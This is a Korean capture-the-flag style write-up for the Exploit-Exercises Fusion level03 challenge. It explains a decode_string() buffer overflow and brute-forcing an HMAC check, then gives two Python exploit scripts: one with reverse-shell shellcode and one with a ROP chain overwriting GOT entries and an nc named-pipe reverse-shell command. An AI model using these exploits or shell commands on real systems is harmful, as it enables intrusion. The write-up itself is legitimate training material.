[exploit-exercise] fusion level03

보호기법은 ASLR과 NX-bit가 걸려 있습니다.

level03 문제 같은 경우는 입력 값에 대한 필터링이 몇 개 존재하고, 특이한 점은 클라이언트에게 입력 받자마자 소켓을 닫아버립니다. 따라서, exploit은 최초 한 번 입력 후 서버가 다시 reverse bind 하는 방법으로 작성하였습니다.

bof가 발생하는 부분은 decode_string() 함수입니다. 

decode_string() 함수의 경우 전체적인 동작은 memcpy(src, dest, size) 와 비슷한데, size를 체크하는 부분에서 '<', '>' 와 같이 비교해야하는데, 단순히 != 로 비교하기 때문입니다. 

void decode_string(const char *src, unsigned char *dest, int *dest_len) { char swap[5], *p; int what; unsigned char *start, *end; swap[4] = 0; start = dest; // make sure we don't over the end of the allocated space. end = dest + *dest_len; while(*src && dest != end) { // printf("*src = %02x, dest = %p, end = %p\n", (unsigned char) // *src, dest, end);

그래서, 이 부분만 넘어가게 되면 while문에서 조건을 검사할 때 dest != end 부분은 계속 참을 가지게 되고, src변수가 끝날 때 까지 계속 dest 변수에 복사를 하게 됩니다.

그리고 while문 안을 보면 아래 소스와 같이 '\\u' 인 경우 dest를 두 번 증가시켜주는 부분을 볼 수 있습니다.

따라서, 초기에 src에 A를 127개 넣고 그다음에 \\u를 넣으면 dest++; dest++; 하게되어 dest>end인 경우가 되어버리게 됩니다. 이러면 dest != end는 무조건 참이 됩니다.

if(*src == '\\') { *src++; // printf("-> in src == '\\', next byte is %02x\n", *src); switch(*src) { case '"': case '\\': case '/': *dest++ = *src++; break; case 'b': *dest++ = '\b'; src++; break; case 'f': *dest++ = '\f'; src++; break; case 'n': *dest++ = '\n'; src++; break; case 'r': *dest++ = '\r'; src++; break; case 't': *dest++ = '\t'; src++; break; case 'u': src++; // printf("--> in \\u handling. got %.4s\n", // src); memcpy(swap, src, 4); p = NULL; what = strtol(swap, &p, 16); // printf("--> and in hex, %08x\n", what); *dest++ = (what >> 8) & 0xff; *dest++ = (what & 0xff); src += 4; break; default: errx(EXIT_FAILURE, "Unhandled encoding found"); break; } } else { *dest++ = *src++; }

validate_request() 함수에서는 클라이언트에서 입력받은 값을 token을 키로하여 sha1 해쉬 알고리즘으로 HMAC연산을 하게 됩니다. 여기서 그 해쉬화된 20바이트의 결과 값에 result[0] 바이트와 result[1] 바이트의 or 연산 값이 0이 나와야 checksum 검증을 통과할 수 있습니다.

이 함수의 경우엔 단순히 해쉬 알고리즘의 충돌쌍을 구한다고 하지만 따지고 보면 두 바이트만 0에 맞게 맞춰주면 되기 때문에 공격 페이로드를 기준으로 랜덤 값을 추가하여 조건에 맞을 때 까지 브루트포싱 하였습니다.

그래서 아래와 같은 exploit 코드를 작성하였습니다. (실패한 exploit)

from socket import * import time import struct import re import hmac import hashlib host = "192.168.0.107" port = 20003 shellcode = ("\x31\xdb\xf7\xe3\x52\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\x68" "\xaa\xbb\xcc\xdd" #ip "\x66\x68" "\x05\x39" #port "\x66\x51\xb0\x3f\xcd\x80\x49\x79\xf9\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0" "\x66\xcd\x80\x52\xb8\x44\x44\x44\x44\x35\x2a\x6b\x37\x2c\x50\xb8\x44\x44" "\x44\x44\x35\x6b\x6b\x26\x2d\x50\x31\xc0\x31\xc9\x89\xe3" "\xb0\x0b\xcd\x80") p = lambda x: struct.pack("<L", x) up = lambda x: struct.unpack("<L", x)[0] def recv_until(s, strings): data = '' while 1: if strings in data: return data else: data += s.recv(1) def recv_token(s): return s.recv(1024)[1:-2] def checksum(token, payload): temp = payload i = 0x00000000 while 1: hash = hmac.new(token, temp, hashlib.sha1).hexdigest() a, b = int(hash[:2], 16), int(hash[2:4], 16) if ((a|b)==0): return temp else: temp = payload i = i+1 temp += p(i) def make_payload(): ppppr = 0x804a26c g_Title = 0x804be00 memcpy_plt = 0x8048e60 rand_plt = 0x8048f30 rand_got = 0x804bd98 bss = 0x804be40 gadget_pop_eax = 0x8048f90 + 0xbbf # pop eax ; add esp, 0x5c ; ret gadget_pop_ebx = 0x8048f90 + 0xabf # pop ebx ; ret gadget_add_addr = 0x8048f90 + 0x46e # add [ebx + 0x5d5b04c4], eax ; ret # ebx + 0x5d5b04c4 = &rand_got -> ebx = 0xAAA9b8d4 # eax = rand_libc + 0x9b020 -> eax = 0x9b020 # decode_string(payload, title[128], 128) payload = '' #payload += "A"*127 payload += "\x90"*10 + shellcode + "\x90"*(127-10-len(shellcode)) payload += "\\\\u" payload += "A"*35 payload += p(gadget_pop_eax) # eip payload += p(0x9b020) payload += "A"*0x5c payload += p(gadget_pop_ebx) payload += p(0xaaa9b8d4) payload += p(gadget_add_addr) # got overwrite, *rand_got -> mprotect_libc payload += p(rand_plt) # mprotect() payload += p(ppppr+1) payload += p(bss-0xe40) payload += p(0x1000) payload += p(7) payload += p(memcpy_plt) payload += p(bss) payload += p(bss) payload += p(g_Title) payload += p(127) return payload def exploit(s): print "[+] Start Exploit" token = recv_token(s) print " - recv token :", token payload = make_payload() token_xml = '' token_xml += token + '\n' token_xml += "{" token_xml += "\"title\": " token_xml += "\"" token_xml += payload # <- exploit payload token_xml += "\"" token_xml += "}" token_xml += '\n' # if there is no '\n' character, recv parsing error. # because, after 'token_xml' strings will attach random string for hash collision print " - Calc hash collision..." hash_collision = checksum(token, token_xml) print " - checksum ok!!" print hash_collision time.sleep(1) print "[+] Sending Exploit" s.send(hash_collision) time.sleep(0.2) s.close() def connect(): s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) return s def main(): try: s = connect() except ConnError: print "Connection Failed!" else: print "[+] Connect Server" print "host :", host, " , port :", str(port) print '' exploit(s) if __name__ == "__main__": main()

위 exploit 코드는 가젯을 이용해서 rand() 함수를 got overwrite 하여 mprotect() 함수로 바꿔주고 이를 이용해 쉘코드를 실행시키는 코드인데, 결과적으론 실패하였습니다.

이유는 parse_request() 함수의 json_tokener_parse() 함수에서 인자로 들어간 스트링에 NULL 바이트가 포함되면 파싱에 실패하기 때문입니다.

그리고 위 exploit 코드에서는 bss 영역에 g_Title에 입력한 메모리를 복사해주고 해당 부분으로 점프하도록 되어 있는데, g_Title은 포인터값으로 해당 부분에는 입력 값이 아니라 할당된 힙 주소가 적혀있으므로 이 부분도 틀렸습니다.

따라서, 새로운 exploit 코드는 NULL byte가 없는 공격 페이로드를 작성하고 system() 함수를 이용하여 nc를 실행해 reverse bind 하도록 작성하였습니다. 그리고, fake ebp를 통해 bss 영역에 있는 gContents 포인터 변수에 저장된 주소를 system() 함수의 인자로 들어가게 하여 1차 익스플로잇에서 실패한 부분을 모두 수정하였습니다.

from socket import * import time import struct import re import hmac import hashlib host = "192.168.0.107" port = 20003 p = lambda x: struct.pack("<L", x) up = lambda x: struct.unpack("<L", x)[0] def recv_until(s, strings): data = '' while 1: if strings in data: return data else: data += s.recv(1) def recv_token(s): return s.recv(1024)[1:-2] def checksum(token, payload): temp = payload i = 0x00000000 while 1: hash = hmac.new(token, temp, hashlib.sha1).hexdigest() a, b = int(hash[:2], 16), int(hash[2:4], 16) if ((a|b)==0): return temp else: temp = payload i = i+1 temp += p(i) def make_payload(): leaveret = 0x8049431 gContents = 0x804bdf4 gContents_len = 0x0804bdec malloc_plt = 0x8048ef0 malloc_got = 0x804bd88 gadget_pop_eax = 0x8048f90 + 0xbbf # pop eax ; add esp, 0x5c ; ret gadget_pop_ebx = 0x8048f90 + 0xabf # pop ebx ; ret gadget_add_addr = 0x8048f90 + 0x46e # add [ebx + 0x5d5b04c4], eax ; ret # ebx + 0x5d5b04c4 = &malloc_got -> ebx = 0xAAA9b8c4 # *strchr_got + 0xfffc56f0 = system_libc -> eax = 0xfffc56f0 # decode_string(payload, title[128], 128) payload = '' payload += "A"*127 payload += "\\\\u" payload += "A"*31 payload += p(gContents_len-4) # fake ebp payload += p(gadget_pop_eax) # eip payload += p(0xfffca6f0) # if malloc_libc < system_libc, then can't do it payload += "A"*0x5c payload += p(gadget_pop_ebx) payload += p(0xaaa9b8c4) payload += p(gadget_add_addr) # got overwrite, *malloc_got -> system_libc payload += p(gadget_pop_eax) payload += p(0x08048e91) payload += "A"*0x5c payload += p(gadget_pop_ebx) payload += p(0xaaa9b928) payload += p(gadget_add_addr) # arbitrary write, *gContents_len -> malloc_plt(system_libc) payload += p(leaveret) return payload def exploit(s): print "[+] Start Exploit" token = recv_token(s) print " - recv token :", token payload = make_payload() token_xml = '' token_xml += token + '\n' token_xml += "{" token_xml += "\"title\": " token_xml += "\"" token_xml += payload # <- exploit payload token_xml += "\"" token_xml += ", " token_xml += "\"contents\": \"mknod /tmp/backpipe p ; /bin/sh 0< /tmp/backpipe | /bin/nc 255.255.255.255 1337 1> /tmp/backpipe\"" token_xml += "}" token_xml += '\n' # if there is no '\n' character, you will recv parsing error. # because, after 'token_xml' strings will attach random string for hash collision print " - Calc hash collision..." hash_collision = checksum(token, token_xml) print " - checksum ok!!" print hash_collision time.sleep(1) print "[+] Sending Exploit" s.send(hash_collision) time.sleep(0.2) s.close() def connect(): s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) return s def main(): print "[+] Exploit-Exercise Fusion Level03" try: s = connect() print "[+] Connection Success" except ConnError: print "Connection Failed!" else: print "[+] Connect Server" print "host :", host, " , port :", str(port) print '' exploit(s) if __name__ == "__main__": main()

% *malloc_got -> system_libc

add [ebx + 0x5d5b04c4], eax ; ret 와 같은 형식의 가젯을 이용해 got overwrite 할 때, 만약 변경 대상이 되는 함수 (malloc)의 libc 주소가 변경 하려는 함수(system) 의 libc 보다 커야 eax 레지스터에 NULL바이트가 아닌 값을 넣을 수 있게됩니다.

---

위 문제를 풀면서 참고했던 사이트들 주소

https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem

 - nc(netcat)을 이용한 backdoor (nc에서 -e 옵션이 없을 때)

http://egloos.zum.com/improf/v/2916457

  - openssl의 HMAC함수의 인자 설명

http://bujakim.blogspot.kr/2014/09/linux-c-c-json-json-c_3.html

  - c언어에서의 json 형식

http://imgproxy.dahlia.kr/

  - python에서의 hmac 사용